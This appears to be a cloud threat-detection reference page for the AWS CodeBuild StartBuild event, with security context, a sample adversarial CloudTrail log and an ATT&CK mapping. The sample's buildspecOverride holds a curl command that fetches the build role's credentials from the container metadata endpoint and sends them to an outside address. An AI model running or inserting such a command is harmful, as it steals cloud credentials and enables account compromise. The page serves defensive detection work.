Skip to content

StartBuild

AWS

StartBuild

service: AWS - CodeBuild
tactics:
techniques:

Event

Starts a CodeBuild build, executing arbitrary code with the build project’s IAM role credentials.

Security Context

  • CodeBuild executes buildspec commands with the full permissions of the build project’s IAM role, allowing an attacker to run arbitrary code with potentially elevated privileges in an isolated compute environment.
  • Adversaries abuse CodeBuild to execute commands, exfiltrate credentials from the build environment, or pivot to other services using the build role’s permissions without leaving traces on production instances.

Log Source

CloudTrail

Sample Event

Adversarial. Draco invokes StartBuild on the existing CodeBuild project occamy-pipeline-build with buildspecOverride containing a command that prints the build role’s STS credentials to the build log. Because CodeBuild runs the build with the project’s IAM role, the build process inherits whatever permissions the role has — even if Draco can’t directly assume it. He gets the credentials by reading the CloudWatch logs of the build (or by exfilling them from inside the build container). T1059 (cloud admin command via CodeBuild).

{
"eventVersion": "1.09",
"userIdentity": {
"type": "IAMUser",
"principalId": "AIDADRAC0MALF0YBADGY",
"arn": "arn:aws:iam::555123456789:user/draco",
"accountId": "555123456789",
"accessKeyId": "AKIADRAC0MALF0YEXAMP5",
"userName": "draco",
"sessionContext": {
"attributes": {
"creationDate": "2026-04-15T18:51:02Z",
"mfaAuthenticated": "false"
}
}
},
"eventTime": "2026-04-15T20:48:51Z",
"eventSource": "codebuild.amazonaws.com",
"eventName": "StartBuild",
"awsRegion": "us-east-1",
"sourceIPAddress": "203.0.113.66",
"userAgent": "aws-cli/1.18.147 Python/3.7.10 Linux/5.4.0-1045-aws botocore/1.18.6",
"requestParameters": {
"projectName": "occamy-pipeline-build",
"buildspecOverride": "version: 0.2\nphases:\n build:\n commands:\n - curl -s 169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI | curl -s --data-binary @- http://203.0.113.77/c"
},
"responseElements": {
"build": {
"id": "occamy-pipeline-build:90000000-0000-4000-8000-000110110010",
"arn": "arn:aws:codebuild:us-east-1:555123456789:build/occamy-pipeline-build:90000000-0000-4000-8000-000110110010",
"buildNumber": 137,
"startTime": "Apr 15, 2026 8:48:51 PM",
"currentPhase": "QUEUED",
"buildStatus": "IN_PROGRESS",
"projectName": "occamy-pipeline-build",
"initiator": "draco",
"serviceRole": "arn:aws:iam::555123456789:role/OccamyCodeBuildRole",
"encryptionKey": "arn:aws:kms:us-east-1:555123456789:alias/aws/s3",
"logs": {
"groupName": "/aws/codebuild/occamy-pipeline-build",
"streamName": "90000000-0000-4000-8000-000110110010"
}
}
},
"requestID": "90000000-0000-4000-8000-000110110010",
"eventID": "90000000-0000-4000-8000-000110110011",
"readOnly": false,
"eventType": "AwsApiCall",
"managementEvent": true,
"recipientAccountId": "555123456789",
"eventCategory": "Management",
"tlsDetails": {
"tlsVersion": "TLSv1.3",
"cipherSuite": "TLS_AES_128_GCM_SHA256",
"clientProvidedHostHeader": "codebuild.us-east-1.amazonaws.com"
}
}

MITRE ATT&CK Mapping

Tactics: Execution

Techniques:
  • T1059 — Command and Scripting Interpreter — Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface a...